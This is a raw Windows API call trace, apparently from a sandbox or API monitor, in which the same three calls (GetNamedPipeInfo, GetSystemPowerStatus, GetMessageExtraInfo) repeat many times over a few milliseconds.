	[0171.643] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.644] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.644] GetMessageExtraInfo () returned 0x0
	[0171.644] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.644] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.644] GetMessageExtraInfo () returned 0x0
	[0171.644] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.644] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.644] GetMessageExtraInfo () returned 0x0
	[0171.644] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.644] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.644] GetMessageExtraInfo () returned 0x0
	[0171.644] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.644] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.644] GetMessageExtraInfo () returned 0x0
	[0171.644] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.644] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.644] GetMessageExtraInfo () returned 0x0
	[0171.644] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.644] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.644] GetMessageExtraInfo () returned 0x0
	[0171.644] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.644] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.644] GetMessageExtraInfo () returned 0x0
	[0171.644] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.644] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.644] GetMessageExtraInfo () returned 0x0
	[0171.644] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.644] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.644] GetMessageExtraInfo () returned 0x0
	[0171.644] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.644] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.644] GetMessageExtraInfo () returned 0x0
	[0171.644] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.644] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.644] GetMessageExtraInfo () returned 0x0
	[0171.644] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.645] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.645] GetMessageExtraInfo () returned 0x0
	[0171.645] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.645] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.645] GetMessageExtraInfo () returned 0x0
	[0171.645] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.645] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.645] GetMessageExtraInfo () returned 0x0
	[0171.645] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.645] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.645] GetMessageExtraInfo () returned 0x0
	[0171.645] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.645] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.645] GetMessageExtraInfo () returned 0x0
	[0171.645] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.645] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.645] GetMessageExtraInfo () returned 0x0
	[0171.645] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.645] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.645] GetMessageExtraInfo () returned 0x0
	[0171.645] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.645] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.645] GetMessageExtraInfo () returned 0x0
	[0171.645] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.645] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.645] GetMessageExtraInfo () returned 0x0
	[0171.645] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.645] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.645] GetMessageExtraInfo () returned 0x0
	[0171.645] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.645] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.645] GetMessageExtraInfo () returned 0x0
	[0171.645] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.645] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.645] GetMessageExtraInfo () returned 0x0
	[0171.646] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.646] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.646] GetMessageExtraInfo () returned 0x0
	[0171.646] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.646] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.646] GetMessageExtraInfo () returned 0x0
	[0171.646] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.646] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.646] GetMessageExtraInfo () returned 0x0
	[0171.646] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.646] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.646] GetMessageExtraInfo () returned 0x0
	[0171.646] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.646] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.646] GetMessageExtraInfo () returned 0x0
	[0171.646] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.646] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.646] GetMessageExtraInfo () returned 0x0
	[0171.646] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.646] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.646] GetMessageExtraInfo () returned 0x0
	[0171.646] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.646] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.646] GetMessageExtraInfo () returned 0x0
	[0171.646] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.646] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.646] GetMessageExtraInfo () returned 0x0
	[0171.646] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.646] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.646] GetMessageExtraInfo () returned 0x0
	[0171.646] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.646] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.646] GetMessageExtraInfo () returned 0x0
	[0171.646] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.647] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.647] GetMessageExtraInfo () returned 0x0
	[0171.647] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.647] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.647] GetMessageExtraInfo () returned 0x0
	[0171.647] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.647] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.647] GetMessageExtraInfo () returned 0x0
	[0171.647] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.647] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.647] GetMessageExtraInfo () returned 0x0
	[0171.647] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.647] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.647] GetMessageExtraInfo () returned 0x0
	[0171.647] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.647] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.647] GetMessageExtraInfo () returned 0x0
	[0171.647] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.647] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.647] GetMessageExtraInfo () returned 0x0
	[0171.647] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.647] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.647] GetMessageExtraInfo () returned 0x0
	[0171.647] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.647] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.647] GetMessageExtraInfo () returned 0x0
	[0171.647] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.647] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.647] GetMessageExtraInfo () returned 0x0
	[0171.647] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.647] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.647] GetMessageExtraInfo () returned 0x0
	[0171.647] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.647] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.648] GetMessageExtraInfo () returned 0x0
	[0171.648] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.648] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.648] GetMessageExtraInfo () returned 0x0
	[0171.648] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.648] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.648] GetMessageExtraInfo () returned 0x0
	[0171.648] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.648] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.648] GetMessageExtraInfo () returned 0x0
	[0171.648] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.648] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.648] GetMessageExtraInfo () returned 0x0
	[0171.648] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.648] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.648] GetMessageExtraInfo () returned 0x0
	[0171.648] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.648] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.648] GetMessageExtraInfo () returned 0x0
	[0171.648] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.648] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.648] GetMessageExtraInfo () returned 0x0
	[0171.648] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.648] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.648] GetMessageExtraInfo () returned 0x0
	[0171.648] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.648] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.648] GetMessageExtraInfo () returned 0x0
	[0171.648] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.648] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.648] GetMessageExtraInfo () returned 0x0
	[0171.648] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.648] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.648] GetMessageExtraInfo () returned 0x0
	[0171.648] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.649] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.649] GetMessageExtraInfo () returned 0x0
	[0171.649] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.649] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.649] GetMessageExtraInfo () returned 0x0
	[0171.649] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.649] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.649] GetMessageExtraInfo () returned 0x0
	[0171.649] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.649] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.649] GetMessageExtraInfo () returned 0x0
	[0171.649] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.649] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.649] GetMessageExtraInfo () returned 0x0
	[0171.649] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.649] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.649] GetMessageExtraInfo () returned 0x0
